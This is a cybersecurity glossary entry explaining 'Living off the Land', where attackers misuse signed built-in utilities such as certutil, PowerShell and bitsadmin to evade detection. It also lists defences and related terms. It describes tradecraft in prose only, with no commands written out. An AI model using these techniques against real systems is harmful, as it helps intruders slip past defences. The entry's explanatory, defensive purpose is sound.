Living off the Land
What is Living off the Land?
Living off the LandAn attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware.
Living off the Land (LotL) describes intrusions where adversaries achieve execution, discovery, persistence, and lateral movement using built-in operating-system utilities and trusted administrative software (PowerShell, WMI, certutil, bitsadmin, schtasks, rundll32, ssh, curl, AWS CLI). Because these binaries are signed and expected, they often evade signature-based antivirus and blend into normal admin telemetry, making detection a behavioural problem rather than a file-hash problem. LotL is closely tied to MITRE ATT&CK defense-evasion and execution tactics and is heavily used by APT groups and ransomware affiliates. Defences focus on application control (WDAC/AppLocker), command-line and script-block logging, EDR behavioural analytics, and least privilege.
● Examples
- 01
Using certutil.exe to download a second-stage payload from an attacker-controlled URL.
- 02
Running encoded PowerShell with bitsadmin and scheduled tasks instead of installing an EXE.
● Frequently asked questions
What is Living off the Land?
An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware. It belongs to the Attacks & Threats category of cybersecurity.
What does Living off the Land mean?
An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware.
How does Living off the Land work?
Living off the Land (LotL) describes intrusions where adversaries achieve execution, discovery, persistence, and lateral movement using built-in operating-system utilities and trusted administrative software (PowerShell, WMI, certutil, bitsadmin, schtasks, rundll32, ssh, curl, AWS CLI). Because these binaries are signed and expected, they often evade signature-based antivirus and blend into normal admin telemetry, making detection a behavioural problem rather than a file-hash problem. LotL is closely tied to MITRE ATT&CK defense-evasion and execution tactics and is heavily used by APT groups and ransomware affiliates. Defences focus on application control (WDAC/AppLocker), command-line and script-block logging, EDR behavioural analytics, and least privilege.
How do you defend against Living off the Land?
Defences for Living off the Land typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Living off the Land?
Common alternative names include: LotL, LOL.
● Related terms
- attacks№ 632
LOLBin / LOLBAS
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.
- malware№ 417
Fileless Malware
Malware that runs primarily in memory and leverages trusted system tools, avoiding the use of traditional executable files on disk.
- defense-ops№ 298
Defense Evasion
The MITRE ATT&CK tactic (TA0005) covering techniques attackers use to avoid detection, disable security tools, and hide their activity on a target system.
- defense-ops№ 682
Mimikatz
An open-source Windows post-exploitation tool that extracts plaintext passwords, hashes, Kerberos tickets, and other credentials from memory and LSASS.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
An endpoint security technology that continuously records process, file, registry and network activity to detect, investigate and respond to threats on hosts.
- defense-ops№ 1147
Threat Hunting
Proactive, hypothesis-driven search through telemetry to uncover threats that have evaded existing detections.
● See also
- № 045AMSI Bypass
- № 1186UAC Bypass